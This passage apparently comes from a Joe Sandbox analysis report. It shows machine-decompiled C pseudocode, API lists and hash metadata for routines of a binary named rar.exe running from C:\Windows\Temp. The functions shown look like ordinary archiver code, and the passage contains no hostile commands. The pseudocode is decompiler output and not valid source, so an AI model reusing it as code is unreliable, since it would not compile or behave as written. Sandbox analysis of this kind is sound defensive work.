				if ( *((short*)(_t73 + 2)) != 0x2f) goto 0x50b446f6;
				goto 0x50b446f6;
				_t18 = _t103 + 6; // 0x807
				if (__r8 - _t18 <= 0) goto 0x50b44827;
				E00007FF67FF650B5A390(__rdx, L"\\\\?\\", __r8);
				_v4 = r15w;
				E00007FF67FF650B5A368(_t18, __rdx, __r8);
				goto 0x50b446f6;
				return E00007FF67FF650B69D10(0, 0x7ff, _a4088 ^ _t106);
			}















                                                                                                            0x7ff650b44664
                                                                                                            0x7ff650b44675
                                                                                                            0x7ff650b4467a
                                                                                                            0x7ff650b4467d
                                                                                                            0x7ff650b44687
                                                                                                            0x7ff650b4468f
                                                                                                            0x7ff650b44698
                                                                                                            0x7ff650b4469f
                                                                                                            0x7ff650b446a5
                                                                                                            0x7ff650b446aa
                                                                                                            0x7ff650b446b1
                                                                                                            0x7ff650b446b9
                                                                                                            0x7ff650b446c5
                                                                                                            0x7ff650b446d5
                                                                                                            0x7ff650b446d7
                                                                                                            0x7ff650b446de
                                                                                                            0x7ff650b446f1
                                                                                                            0x7ff650b446ff
                                                                                                            0x7ff650b44706
                                                                                                            0x7ff650b4470f
                                                                                                            0x7ff650b4471a
                                                                                                            0x7ff650b44720
                                                                                                            0x7ff650b44727
                                                                                                            0x7ff650b4473a
                                                                                                            0x7ff650b4474c
                                                                                                            0x7ff650b44755
                                                                                                            0x7ff650b4476e
                                                                                                            0x7ff650b44778
                                                                                                            0x7ff650b4477e
                                                                                                            0x7ff650b4478a
                                                                                                            0x7ff650b44794
                                                                                                            0x7ff650b4479c
                                                                                                            0x7ff650b4479e
                                                                                                            0x7ff650b447a8
                                                                                                            0x7ff650b447b7
                                                                                                            0x7ff650b447c7
                                                                                                            0x7ff650b447d0
                                                                                                            0x7ff650b447db
                                                                                                            0x7ff650b447e2
                                                                                                            0x7ff650b447ec
                                                                                                            0x7ff650b447f1
                                                                                                            0x7ff650b447f8
                                                                                                            0x7ff650b44807
                                                                                                            0x7ff650b4480f
                                                                                                            0x7ff650b4481d
                                                                                                            0x7ff650b44822
                                                                                                            0x7ff650b4484f

                                                                                                            APIs
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000801,00000800,00000000,00000800,?,00007FF650B3229D), ref: 00007FF650B44761
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory
                                                                                                            • String ID: UNC$\\?\
                                                                                                            • API String ID: 1611563598-253988292
                                                                                                            • Opcode ID: 8603f59df1f9d68547a88a376b48e558dfb6cf1928de7e5d1f7c0bdec701da7b
                                                                                                            • Instruction ID: 3e6065e22cf646e2c71f8255197e10e6b4084c295ed85a08b3668f46dd2ae294
                                                                                                            • Opcode Fuzzy Hash: 8603f59df1f9d68547a88a376b48e558dfb6cf1928de7e5d1f7c0bdec701da7b
                                                                                                            • Instruction Fuzzy Hash: 5341A315E0828374EA60AF11E4801BA63E2EF07BC4F498131DE9FA77D5FF6DE6558242
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B739E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 52%
                                                                                                            			E00007FF67FF650B739E4(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t27;
				intOrPtr _t36;
				intOrPtr* _t62;
				long long _t68;
				void* _t70;
				long long _t84;
				signed int _t85;
				intOrPtr* _t86;
				void* _t89;

				_t70 = __rcx;
				_a8 = __rbx;
				_t2 = _t70 - 1; // -1
				r14d = __ecx;
				if (_t2 - 1 <= 0) goto 0x50b73a18;
				_t27 = E00007FF67FF650B74DAC(__rax);
				 *__rax = 0x16;
				E00007FF67FF650B74C8C(_t27);
				goto 0x50b73b47;
				E00007FF67FF650B78FE0();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t86 =  *0x50bb3bf0; // 0x1f9cbcb3570
				 *0x50bb3c00 = 0x50bb3a70;
				if (_t86 == 0) goto 0x50b73a4f;
				if ( *_t86 != dil) goto 0x50b73a52;
				_t62 =  &_a32;
				_a24 = _t85;
				_v56 = _t62;
				r8d = 0;
				_a32 = _t85;
				E00007FF67FF650B737C4(0x50bb3a70, 0x50bb3a70, 0x50bb3a70, _t85, 0x50bb3a70, _t89, __r8,  &_a24);
				r8d = 1;
				E00007FF67FF650B73980(_a24, _a32, __r8);
				_t68 = _t62;
				if (_t62 != 0) goto 0x50b73aa3;
				E00007FF67FF650B74DAC(_t62);
				_t10 = _t68 + 0xc; // 0xc
				 *_t62 = _t10;
				goto 0x50b73b42;
				_v56 =  &_a32;
				E00007FF67FF650B737C4(_t68, 0x50bb3a70, _t68, _t85, 0x50bb3a70, _t89, _t62 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x50b73ad9;
				_t36 = _a24 - 1;
				 *0x50bb3be0 = _t68;
				 *0x50bb3bd8 = _t36;
				goto 0x50b73a9c;
				_a16 = _t85;
				0x50b788d4();
				if (_t36 == 0) goto 0x50b73b08;
				E00007FF67FF650B7495C( &_a32, _a16);
				_a16 = _t85;
				E00007FF67FF650B7495C( &_a32, _t68);
				goto 0x50b73b47;
				_t84 = _a16;
				if ( *_t84 == _t85) goto 0x50b73b23;
				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x50b73b17;
				 *0x50bb3bd8 = 0;
				_a16 = _t85;
				 *0x50bb3be0 = _t84;
				E00007FF67FF650B7495C(_t84 + 8, _t85 + 1);
				_a16 = _t85;
				E00007FF67FF650B7495C(_t84 + 8, _t68);
				return _t36;
			}
















                                                                                                            0x7ff650b739e4
                                                                                                            0x7ff650b739e4
                                                                                                            0x7ff650b739f7
                                                                                                            0x7ff650b739fa
                                                                                                            0x7ff650b73a00
                                                                                                            0x7ff650b73a02
                                                                                                            0x7ff650b73a0c
                                                                                                            0x7ff650b73a0e
                                                                                                            0x7ff650b73a13
                                                                                                            0x7ff650b73a18
                                                                                                            0x7ff650b73a24
                                                                                                            0x7ff650b73a2f
                                                                                                            0x7ff650b73a35
                                                                                                            0x7ff650b73a3e
                                                                                                            0x7ff650b73a48
                                                                                                            0x7ff650b73a4d
                                                                                                            0x7ff650b73a52
                                                                                                            0x7ff650b73a56
                                                                                                            0x7ff650b73a5e
                                                                                                            0x7ff650b73a63
                                                                                                            0x7ff650b73a66
                                                                                                            0x7ff650b73a6f
                                                                                                            0x7ff650b73a78
                                                                                                            0x7ff650b73a85
                                                                                                            0x7ff650b73a8a
                                                                                                            0x7ff650b73a90
                                                                                                            0x7ff650b73a92
                                                                                                            0x7ff650b73a97
                                                                                                            0x7ff650b73a9a
                                                                                                            0x7ff650b73a9e
                                                                                                            0x7ff650b73ab5
                                                                                                            0x7ff650b73aba
                                                                                                            0x7ff650b73ac3
                                                                                                            0x7ff650b73ac8
                                                                                                            0x7ff650b73aca
                                                                                                            0x7ff650b73ad1
                                                                                                            0x7ff650b73ad7
                                                                                                            0x7ff650b73add
                                                                                                            0x7ff650b73ae4
                                                                                                            0x7ff650b73aed
                                                                                                            0x7ff650b73af3
                                                                                                            0x7ff650b73afb
                                                                                                            0x7ff650b73aff
                                                                                                            0x7ff650b73b06
                                                                                                            0x7ff650b73b08
                                                                                                            0x7ff650b73b15
                                                                                                            0x7ff650b73b21
                                                                                                            0x7ff650b73b23
                                                                                                            0x7ff650b73b2b
                                                                                                            0x7ff650b73b2f
                                                                                                            0x7ff650b73b36
                                                                                                            0x7ff650b73b3e
                                                                                                            0x7ff650b73b42
                                                                                                            0x7ff650b73b59

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                            • String ID: C:\Windows\Temp\rar.exe
                                                                                                            • API String ID: 3307058713-1220783861
                                                                                                            • Opcode ID: e188dc15817fce65bebaf69294613fe8614179ce02faf246674eb7ce379d0360
                                                                                                            • Instruction ID: 0782a03766ff0effe40cec437ba77892b02ac07e297ece9a9a6784391ff1d55d
                                                                                                            • Opcode Fuzzy Hash: e188dc15817fce65bebaf69294613fe8614179ce02faf246674eb7ce379d0360
                                                                                                            • Instruction Fuzzy Hash: 49418E32A08A53AAEB65DF25E4C10BD6794EB46F84B1C4135EE4FA7B95DF3EE4418300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4F1C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E00007FF67FF650B4F1C8(void* __ecx, void* __edi, void* __rax, void* __rcx, void* __rdx, void* __r9, signed long long _a8, char _a16, char _a24, char _a32, char _a72, signed int _a4168) {
				long long _v0;
				long long _v8;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t30;
				signed long long _t46;
				void* _t50;
				void* _t66;
				intOrPtr _t67;
				void* _t68;
				void* _t69;
				signed long long _t70;
				void* _t72;
				void* _t78;
				void* _t79;

				_t77 = __r9;
				_t35 = __ecx;
				E00007FF67FF650B69CB0(0x1080, __rax, _t78, _t79);
				_t70 = _t69 - __rax;
				_t46 =  *0x50b978f0; // 0x27db226282f1
				_t47 = _t46 ^ _t70;
				_a4168 = _t46 ^ _t70;
				_t67 =  *((intOrPtr*)(__rcx + 0x22d8));
				_t50 = __rcx;
				_t3 =  &_a32; // 0x7b8
				_t66 = __rdx;
				if (r9d != 0) goto 0x50b4f21a;
				_t4 = _t77 + 0x14; // 0x15
				r8d = _t4;
				E00007FF67FF650B5A390(_t3, L"fixed.", _t72);
				goto 0x50b4f22b;
				E00007FF67FF650B1657C(__ecx, _t46 ^ _t70, _t3, L"fixed.", L"fixed%u.", __r9);
				r14d = 0x800;
				_t5 = _t67 + 0x201e; // 0x281e
				r9d = r14d;
				_t6 =  &_a72; // 0x7e0
				_t7 =  &_a32; // 0x7b8
				E00007FF67FF650B4511C(E00007FF67FF650B449D0(__ecx, r9d, _t47, _t5, _t7, _t6, _t77), _t47, _t50 + 0x3a);
				_t9 =  &_a72; // 0x7e0
				r8d = r14d;
				E00007FF67FF650B5A368(_t47, _t9, _t6);
				_t10 =  &_a72; // 0x7e0
				E00007FF67FF650B44DEC(0, _t47, _t50, _t10, _t67, _t68);
				_a16 = 0;
				_t12 =  &_a72; // 0x7e0
				_a8 = _a8 & 0x00000000;
				_v0 = 0x7fffffff;
				r9d = r14d;
				_t16 =  &_a24; // 0x7b0
				 *((intOrPtr*)(_t66 + 0x7f78)) = r8d;
				_v8 = _t16;
				_t30 = E00007FF67FF650B317E8(_t50, _t67, _t66, _t66, _t67, _t68, _t12, _t77);
				if (_t30 != 0) goto 0x50b4f2cd;
				if (_a24 != _t30) goto 0x50b4f2c9;
				E00007FF67FF650B2C8F8(_a24 - _t30, 0x50ba7ab8);
				goto 0x50b4f2cf;
				return E00007FF67FF650B69D10(1, _t35, _a4168 ^ _t70);
			}




















                                                                                                            0x7ff650b4f1c8
                                                                                                            0x7ff650b4f1c8
                                                                                                            0x7ff650b4f1d4
                                                                                                            0x7ff650b4f1d9
                                                                                                            0x7ff650b4f1dc
                                                                                                            0x7ff650b4f1e3
                                                                                                            0x7ff650b4f1e6
                                                                                                            0x7ff650b4f1ee
                                                                                                            0x7ff650b4f1f5
                                                                                                            0x7ff650b4f1f8
                                                                                                            0x7ff650b4f200
                                                                                                            0x7ff650b4f206
                                                                                                            0x7ff650b4f208
                                                                                                            0x7ff650b4f208
                                                                                                            0x7ff650b4f213
                                                                                                            0x7ff650b4f218
                                                                                                            0x7ff650b4f226
                                                                                                            0x7ff650b4f22b
                                                                                                            0x7ff650b4f231
                                                                                                            0x7ff650b4f238
                                                                                                            0x7ff650b4f23b
                                                                                                            0x7ff650b4f240
                                                                                                            0x7ff650b4f24e
                                                                                                            0x7ff650b4f256
                                                                                                            0x7ff650b4f25b
                                                                                                            0x7ff650b4f25e
                                                                                                            0x7ff650b4f265
                                                                                                            0x7ff650b4f26a
                                                                                                            0x7ff650b4f26f
                                                                                                            0x7ff650b4f274
                                                                                                            0x7ff650b4f279
                                                                                                            0x7ff650b4f289
                                                                                                            0x7ff650b4f28e
                                                                                                            0x7ff650b4f291
                                                                                                            0x7ff650b4f296
                                                                                                            0x7ff650b4f29f
                                                                                                            0x7ff650b4f2a7
                                                                                                            0x7ff650b4f2ae
                                                                                                            0x7ff650b4f2b4
                                                                                                            0x7ff650b4f2c4
                                                                                                            0x7ff650b4f2cb
                                                                                                            0x7ff650b4f2ec

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: fixed%u.$fixed.
                                                                                                            • API String ID: 233258989-2525383582
                                                                                                            • Opcode ID: 415e846cda4b469d1e3e5ef83fcb9d9e3efa895a0698516cddd1483c3c7cd66d
                                                                                                            • Instruction ID: 261d632a531aec3fbdec80ea7002c6fb7c3efc9ea9e469c32aecce492b133197
                                                                                                            • Opcode Fuzzy Hash: 415e846cda4b469d1e3e5ef83fcb9d9e3efa895a0698516cddd1483c3c7cd66d
                                                                                                            • Instruction Fuzzy Hash: F631F922A0C68371E7109B25E4813E96351EF46784F580132EE8E67B99DF3ED146CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B53670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E00007FF67FF650B53670(intOrPtr __edx, void* __rcx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t30;
				void* _t32;
				void* _t36;
				signed long long _t40;
				void* _t45;
				void* _t64;
				signed long long _t65;
				void* _t67;
				void* _t75;

				_t33 = __edx;
				_t63 = _t64 - 0x27;
				_t65 = _t64 - 0xf0;
				_t40 =  *0x50b978f0; // 0x27db226282f1
				 *(_t64 - 0x27 + 0x17) = _t40 ^ _t65;
				_t30 = r8d;
				if ( *((long long*)(__rcx + 0x58)) <= 0) goto 0x50b53762;
				 *((char*)(_t65 + 0x40)) = 0;
				 *((long long*)(_t65 + 0x38)) = _t65 + 0x40;
				r14d = 0x50;
				 *((intOrPtr*)(_t65 + 0x34)) = __edx;
				if (__r9 == 0) goto 0x50b536d3;
				r8d = r14d;
				E00007FF67FF650B5D390(_t30, _t45, __r9, _t64 - 0xffffffffffffffee, _t67);
				_t36 = _t30;
				if (_t36 == 0) goto 0x50b53704;
				if (_t36 == 0) goto 0x50b536ea;
				if (_t30 - 1 != 1) goto 0x50b53718;
				goto 0x50b536f1;
				snprintf(??, ??, ??);
				goto 0x50b53718;
				E00007FF67FF650B5A2A8(_t65 + 0x40, "s", _t75);
				r9d = 8;
				 *((long long*)(_t65 + 0x20)) = 0x7ff650b534e0;
				E00007FF67FF650B7184C(_t45, _t65 + 0x30,  *((intOrPtr*)(__rcx + 0x28)), __rcx,  *((intOrPtr*)(_t63 + 0x77)), _t63,  *((intOrPtr*)(__rcx + 0x30)), _t63 - 0x39);
				if (0x7ff650b534e0 == 0) goto 0x50b53762;
				E00007FF67FF650B73040(_t33, 0x7ff650b534e0,  *((intOrPtr*)(_t63 + 0x77)),  *((intOrPtr*)(0x50b95558 + ( *((intOrPtr*)(0x7ff650b534e0)) +  *((intOrPtr*)(0x7ff650b534e0))) * 8)),  *((intOrPtr*)(_t63 + 0x7f)));
				goto 0x50b53764;
				return E00007FF67FF650B69D10(0, _t32,  *(_t63 + 0x17) ^ _t65);
			}
















                                                                                                            0x7ff650b53670
                                                                                                            0x7ff650b53677
                                                                                                            0x7ff650b5367c
                                                                                                            0x7ff650b53683
                                                                                                            0x7ff650b5368d
                                                                                                            0x7ff650b53696
                                                                                                            0x7ff650b536a0
                                                                                                            0x7ff650b536a6
                                                                                                            0x7ff650b536b0
                                                                                                            0x7ff650b536b5
                                                                                                            0x7ff650b536bb
                                                                                                            0x7ff650b536c2
                                                                                                            0x7ff650b536c4
                                                                                                            0x7ff650b536ce
                                                                                                            0x7ff650b536d3
                                                                                                            0x7ff650b536d5
                                                                                                            0x7ff650b536da
                                                                                                            0x7ff650b536df
                                                                                                            0x7ff650b536e8
                                                                                                            0x7ff650b536fd
                                                                                                            0x7ff650b53702
                                                                                                            0x7ff650b53713
                                                                                                            0x7ff650b5372c
                                                                                                            0x7ff650b53732
                                                                                                            0x7ff650b53737
                                                                                                            0x7ff650b5373f
                                                                                                            0x7ff650b53759
                                                                                                            0x7ff650b53760
                                                                                                            0x7ff650b5377d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidesnprintf
                                                                                                            • String ID: $%s$@%s
                                                                                                            • API String ID: 3570271137-834177443
                                                                                                            • Opcode ID: d658017862177fa86fabb5a8a5bb39e0866dea6ebecc3ee6a936ec00f4eec5cd
                                                                                                            • Instruction ID: 9120240790116e016c711ccf4004425b98a575588425a2b64edf27b4d155f21f
                                                                                                            • Opcode Fuzzy Hash: d658017862177fa86fabb5a8a5bb39e0866dea6ebecc3ee6a936ec00f4eec5cd
                                                                                                            • Instruction Fuzzy Hash: 7031A2A6A18A43B5EB609F15E4D07B92760FB46B84F480132EE0E77B55EE3FD905C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B15EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00007FF67FF650B15EB0(long long __rbx, void* __rcx, void* __rdx) {
				void* _t19;
				signed long long _t31;
				signed long long _t32;
				void* _t34;
				void* _t43;
				void* _t45;
				void* _t48;
				void* _t50;
				void* _t52;
				signed long long _t53;
				void* _t57;

				_t43 = __rdx;
				 *((long long*)(_t52 + 0x20)) = __rbx;
				_push(_t50);
				_t53 = _t52 - 0x80;
				_t31 =  *0x50b978f0; // 0x27db226282f1
				_t32 = _t31 ^ _t53;
				 *(_t53 + 0x70) = _t32;
				_t34 = __rdx;
				if ( *((intOrPtr*)(__rdx + 0x1103)) == bpl) goto 0x50b15ef6;
				_t4 = _t50 + 0x3b; // 0x3b
				E00007FF67FF650B6B0BC(_t4, __rdx + 0x28);
				if (_t32 == 0) goto 0x50b15ef6;
				 *_t32 = 0;
				_t21 =  *((intOrPtr*)(__rcx + 0x88));
				r9d = E00007FF67FF650B59DAC( *((intOrPtr*)(__rcx + 0x88)));
				E00007FF67FF650B1657C( *((intOrPtr*)(__rcx + 0x88)), _t32, _t53 + 0x20, _t43, L";%%0%du", _t57, _t45);
				r9d = r8d;
				E00007FF67FF650B1657C(_t21, _t32, _t53 + 0x48, _t43, _t53 + 0x20, _t57, _t48);
				r8d = 0x800;
				_t19 = E00007FF67FF650B5A368(_t32, _t34 + 0x28, _t53 + 0x20);
				 *((char*)(_t34 + 0x1103)) = 1;
				return E00007FF67FF650B69D10(_t19, _t21,  *(_t53 + 0x70) ^ _t53);
			}














                                                                                                            0x7ff650b15eb0
                                                                                                            0x7ff650b15eb0
                                                                                                            0x7ff650b15eb5
                                                                                                            0x7ff650b15eb8
                                                                                                            0x7ff650b15ebf
                                                                                                            0x7ff650b15ec6
                                                                                                            0x7ff650b15ec9
                                                                                                            0x7ff650b15ed3
                                                                                                            0x7ff650b15ee0
                                                                                                            0x7ff650b15ee2
                                                                                                            0x7ff650b15ee9
                                                                                                            0x7ff650b15ef1
                                                                                                            0x7ff650b15ef3
                                                                                                            0x7ff650b15ef6
                                                                                                            0x7ff650b15f14
                                                                                                            0x7ff650b15f17
                                                                                                            0x7ff650b15f1c
                                                                                                            0x7ff650b15f2b
                                                                                                            0x7ff650b15f34
                                                                                                            0x7ff650b15f3f
                                                                                                            0x7ff650b15f44
                                                                                                            0x7ff650b15f6a

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: ;%%0%du
                                                                                                            • API String ID: 233258989-2249936285
                                                                                                            • Opcode ID: 9aa12bbb10fe6f8737023604ff15197156c8a01280577378845ed036fd56f302
                                                                                                            • Instruction ID: ffffd501a5b571d1205537ae398cf3e520b077d4743bbac470c966ffb16e5078
                                                                                                            • Opcode Fuzzy Hash: 9aa12bbb10fe6f8737023604ff15197156c8a01280577378845ed036fd56f302
                                                                                                            • Instruction Fuzzy Hash: FD110433B08682A6E7209B24E4803E933A1FB89B84F8C4031DB4E97799DE3ED545CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B336EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 30%
                                                                                                            			E00007FF67FF650B336EC(void* __rax, long long _a24, long long _a32, long long _a40, intOrPtr _a48, char _a56, char _a584, signed int _a4680) {
				void* __rbx;
				void* _t23;
				signed long long _t30;
				long long _t33;
				void* _t34;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;
				void* _t50;
				void* _t51;

				E00007FF67FF650B69CB0(0x1260, __rax, _t50, _t51);
				_t47 = _t46 - __rax;
				_t30 =  *0x50b978f0; // 0x27db226282f1
				_a4680 = _t30 ^ _t46 - __rax;
				r8d = 0x800;
				_t2 =  &_a584; // 0xa30
				E00007FF67FF650B443F0(_t33, _t34, _t2, _t43, _t44, _t45, _t49);
				_a48 = 0x105;
				_t4 =  &_a56; // 0x820
				_a40 = _t4;
				r9d = 0;
				_a32 = _t33;
				r8d = 0;
				_a24 = _t33;
				if (GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x50b33788;
				_t9 =  &_a56; // 0x820
				if (E00007FF67FF650B719B4(GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??), _t9, 0x50b81d78) == 0) goto 0x50b33782;
				_t10 =  &_a56; // 0x820
